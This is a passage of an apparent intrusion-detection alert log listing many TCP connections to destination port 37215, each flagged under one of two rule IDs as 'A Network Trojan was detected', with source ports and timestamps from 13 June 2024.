              SID:2829579
              Source Port:47926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039213
              SID:2835222
              Source Port:55234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093441
              SID:2829579
              Source Port:48148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.073457
              SID:2829579
              Source Port:58342
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.150849
              SID:2829579
              Source Port:37172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841032
              SID:2835222
              Source Port:49224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987953
              SID:2835222
              Source Port:41404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.945494
              SID:2835222
              Source Port:40330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094415
              SID:2829579
              Source Port:37772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506417
              SID:2835222
              Source Port:48158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.610276
              SID:2829579
              Source Port:45676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300113
              SID:2829579
              Source Port:57878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.012216
              SID:2835222
              Source Port:34786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216440
              SID:2829579
              Source Port:51932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027709
              SID:2829579
              Source Port:52912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.835550
              SID:2829579
              Source Port:43046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041382
              SID:2829579
              Source Port:42924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988443
              SID:2829579
              Source Port:37434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.789903
              SID:2835222
              Source Port:44590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453327
              SID:2835222
              Source Port:39046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176668
              SID:2835222
              Source Port:42576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048393
              SID:2829579
              Source Port:50674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.253484
              SID:2835222
              Source Port:56518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252684
              SID:2835222
              Source Port:41834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123001
              SID:2829579
              Source Port:35982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754295
              SID:2835222
              Source Port:49738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040751
              SID:2829579
              Source Port:47714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044417
              SID:2829579
              Source Port:59674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509242
              SID:2829579
              Source Port:34216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.278941
              SID:2829579
              Source Port:48262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.158159
              SID:2835222
              Source Port:45886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041150
              SID:2829579
              Source Port:39636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.869977
              SID:2829579
              Source Port:35520
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758975
              SID:2835222
              Source Port:45390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.977881
              SID:2829579
              Source Port:37066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658905
              SID:2829579
              Source Port:58568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087792
              SID:2829579
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943648
              SID:2829579
              Source Port:37134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356749
              SID:2835222
              Source Port:53226
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.089343
              SID:2835222
              Source Port:40446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273759
              SID:2835222
              Source Port:47938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195380
              SID:2835222
              Source Port:43818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.670786
              SID:2835222
              Source Port:57322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729057
              SID:2835222
              Source Port:39672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.216551
              SID:2829579
              Source Port:52214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040132
              SID:2835222
              Source Port:39496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320023
              SID:2829579
              Source Port:45726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.953780
              SID:2835222
              Source Port:44000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.246891
              SID:2835222
              Source Port:41154
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544161
              SID:2829579
              Source Port:56310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756907
              SID:2835222
              Source Port:46812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.938285
              SID:2829579
              Source Port:57394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.370846
              SID:2829579
              Source Port:60958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048789
              SID:2829579
              Source Port:52410
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.194041
              SID:2829579
              Source Port:35724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.176400
              SID:2835222
              Source Port:49894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545074
              SID:2829579
              Source Port:47440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485956
              SID:2829579
              Source Port:54210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749975
              SID:2835222
              Source Port:44016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.238071
              SID:2829579
              Source Port:57598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.353596
              SID:2835222
              Source Port:41720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.988772
              SID:2829579
              Source Port:35972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784884
              SID:2835222
              Source Port:57220
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.302128
              SID:2835222
              Source Port:43676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.657798
              SID:2835222
              Source Port:36246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.174323
              SID:2835222
              Source Port:43492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125181
              SID:2835222
              Source Port:38246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508073
              SID:2829579
              Source Port:38150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509309
              SID:2835222
              Source Port:56484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344772
              SID:2829579
              Source Port:48536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.832090
              SID:2829579
              Source Port:53972
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.279817
              SID:2835222
              Source Port:60654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.724509
              SID:2835222
              Source Port:38772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177011
              SID:2829579
              Source Port:55444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.440980
              SID:2829579
              Source Port:59360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.306317
              SID:2835222
              Source Port:32848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213170
              SID:2829579
              Source Port:51770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656729
              SID:2829579
              Source Port:59756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042356
              SID:2835222
              Source Port:49356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.173724
              SID:2829579
              Source Port:44302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060290
              SID:2835222
              Source Port:54672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.676000
              SID:2835222
              Source Port:52508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.790705
              SID:2835222
              Source Port:53456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695550
              SID:2835222
              Source Port:46200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242973
              SID:2835222
              Source Port:39340
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303913
              SID:2835222
              Source Port:42038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.458400
              SID:2829579
              Source Port:50386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.400683
              SID:2835222
              Source Port:39478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.304130
              SID:2835222
              Source Port:41018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.938448
              SID:2835222
              Source Port:60272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301220
              SID:2835222
              Source Port:43594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191303
              SID:2835222
              Source Port:60724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.839562
              SID:2829579
              Source Port:34284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177643
              SID:2829579
              Source Port:38184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.418084
              SID:2835222
              Source Port:37904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544440
              SID:2829579
              Source Port:38560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.274733
              SID:2829579
              Source Port:34162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417154
              SID:2835222
              Source Port:36390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272541
              SID:2829579
              Source Port:52492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696214
              SID:2835222
              Source Port:40264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097753
              SID:2829579
              Source Port:48498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730743
              SID:2835222
              Source Port:32818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.679512
              SID:2835222
              Source Port:33660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275555
              SID:2835222
              Source Port:39542
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345282
              SID:2829579
              Source Port:46040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841649
              SID:2835222
              Source Port:59652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176825
              SID:2835222
              Source Port:60838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.349450
              SID:2829579
              Source Port:40780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356502
              SID:2829579
              Source Port:42792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373346
              SID:2829579
              Source Port:54508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403510
              SID:2835222
              Source Port:41202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.508292
              SID:2829579
              Source Port:54532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824041
              SID:2835222
              Source Port:51202
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993663
              SID:2829579
              Source Port:43948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160662
              SID:2829579
              Source Port:52574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318192
              SID:2829579
              Source Port:44030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.729772
              SID:2829579
              Source Port:50914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754397
              SID:2829579
              Source Port:44574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751226
              SID:2829579
              Source Port:38068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.297731
              SID:2829579
              Source Port:55518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452689
              SID:2829579
              Source Port:50420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241520
              SID:2829579
              Source Port:45962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.822382
              SID:2835222
              Source Port:34392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567068
              SID:2829579
              Source Port:41796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487968
              SID:2829579
              Source Port:60304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263719
              SID:2835222
              Source Port:32870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.974860
              SID:2829579
              Source Port:42870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301037
              SID:2829579
              Source Port:53146
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755988
              SID:2835222
              Source Port:56746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842063
              SID:2835222
              Source Port:38106
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180721
              SID:2835222
              Source Port:54608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371345
              SID:2835222
              Source Port:49780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.307561
              SID:2829579
              Source Port:55172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697683
              SID:2829579
              Source Port:51090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994432
              SID:2835222
              Source Port:33626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453647
              SID:2829579
              Source Port:47138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660199
              SID:2829579
              Source Port:39122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317192
              SID:2829579
              Source Port:43784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276438
              SID:2829579
              Source Port:54346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633738
              SID:2835222
              Source Port:34818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243713
              SID:2835222
              Source Port:41620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487423
              SID:2835222
              Source Port:36878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543800
              SID:2829579
              Source Port:48888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244178
              SID:2829579
              Source Port:40682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.971846
              SID:2829579
              Source Port:59838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.833349
              SID:2829579
              Source Port:48376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.572155
              SID:2829579
              Source Port:59102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.672652
              SID:2835222
              Source Port:47932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.125074
              SID:2835222
              Source Port:48004
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214950
              SID:2829579
              Source Port:38170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153228
              SID:2829579
              Source Port:51286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.356947
              SID:2829579
              Source Port:35942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.091324
              SID:2829579
              Source Port:58928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403364
              SID:2829579
              Source Port:35868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402375
              SID:2835222
              Source Port:54066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987857
              SID:2829579
              Source Port:50152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217442
              SID:2835222
              Source Port:51210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941362
              SID:2835222
              Source Port:34032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942351
              SID:2835222
              Source Port:44428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.937479
              SID:2835222
              Source Port:60420
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508955
              SID:2829579
              Source Port:40500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.303168
              SID:2835222
              Source Port:57756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.348698
              SID:2835222
              Source Port:36584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417449
              SID:2829579
              Source Port:52526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605415
              SID:2829579
              Source Port:46934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215676
              SID:2829579
              Source Port:56186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041961
              SID:2829579
              Source Port:39102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660489
              SID:2829579
              Source Port:46642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.454426
              SID:2829579
              Source Port:37460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.677000
              SID:2829579
              Source Port:51884
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.137179
              SID:2829579
              Source Port:46776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.452862
              SID:2829579
              Source Port:46800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.569724
              SID:2829579
              Source Port:52414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.820587
              SID:2835222
              Source Port:42612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.230897
              SID:2829579
              Source Port:40882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.711810
              SID:2829579
              Source Port:35296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.307055
              SID:2829579
              Source Port:57132
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.543362
              SID:2829579
              Source Port:33876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.217985
              SID:2829579
              Source Port:48996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613383
              SID:2829579
              Source Port:60776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823235
              SID:2835222
              Source Port:41798
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042390
              SID:2835222
              Source Port:49652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.078772
              SID:2829579
              Source Port:50412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354598
              SID:2835222
              Source Port:37838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830619
              SID:2829579
              Source Port:41170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438408
              SID:2835222
              Source Port:41060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554653
              SID:2835222
              Source Port:51450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272793
              SID:2829579
              Source Port:48954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345000
              SID:2835222
              Source Port:43142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488995
              SID:2835222
              Source Port:34438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106306
              SID:2829579
              Source Port:51504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546279
              SID:2829579
              Source Port:49050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215015
              SID:2835222
              Source Port:52830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.275357
              SID:2835222
              Source Port:34558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.710863
              SID:2829579
              Source Port:58212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.088895
              SID:2835222
              Source Port:47846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.318325
              SID:2829579
              Source Port:34350
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.079967
              SID:2829579
              Source Port:36948
              Destination Port:37215
